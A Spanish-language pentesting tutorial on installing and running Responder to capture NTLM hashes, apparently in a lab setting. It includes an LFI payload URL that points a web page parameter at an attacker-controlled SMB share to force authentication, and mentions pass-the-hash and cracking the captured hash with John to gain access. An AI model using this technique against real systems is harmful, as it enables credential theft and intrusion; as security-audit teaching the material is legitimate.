Guía Completa para Usar Responder en Pentesting: Capturando Hashes NTLM

Responder es una poderosa herramienta de pentesting utilizada para capturar credenciales en redes locales aprovechando protocolos inseguros. En esta guía, aprenderás a utilizar Responder de forma profesional, explorando sus principales funciones y cómo optimizar su uso en auditorías de seguridad.

🪝​Instalación de Responder

Yo esta herramienta la he clonado simplemente desde GitHub pero la podéis instalar también de la siguiente forma.

sudo apt update && sudo apt install responder -y

Si prefieres clonarlo desde Github como yo:

git clone https://github.com/lgandx/Responder.git

Uso Básico de Responder y Captura de Hashes NTLM

Primero deberemos de iniciar la herramienta en la interfaz adecuada que en mi caso era tun0.

Lo haremos con el siguiente comando.

sudo python3 Responder.py -I tun0

Usualmente, para la captura del hash NTLM necesitaríamos que la víctima accediese a un recurso compartido. Pero en este caso existe otra manera gracias a la vulnerabilidad LFI (Local File Inclusion), que nos permite capturar el hash de manera forzada accediendo a un directorio inexistente o a un archivo de recursos de red de la siguiente forma:

http://paginaweb/index.php?page=\\10.10.14.6\fakefile

Después de esto nos dirigiremos a los logs de la herramienta para ver los hashes capturados.

Una vez capturados podríamos intentar conectarnos a la máquina si existiese la vulnerabilidad de pass the hash o por otra parte podríamos guardar el hash en un archivo y crackearlo con la herramienta de jhon y de esta forma conseguir una contraseña y poder tener intrusión en la maquina.

Opciones Avanzadas de Responder

Responder permite ajustar su configuración en el archivo Responder.conf para definir qué servicios se activan. Por ejemplo, para desactivar SMB y capturar solo hashes HTTP:

SMB = Off
HTTP = On

Ejecutamos nuevamente Responder con parámetros avanzados:

sudo python3 Responder.py -I eth0 -rv

Donde:

  • -r: Responde solo a peticiones específicas.
  • -v: Muestra más detalles en la salida.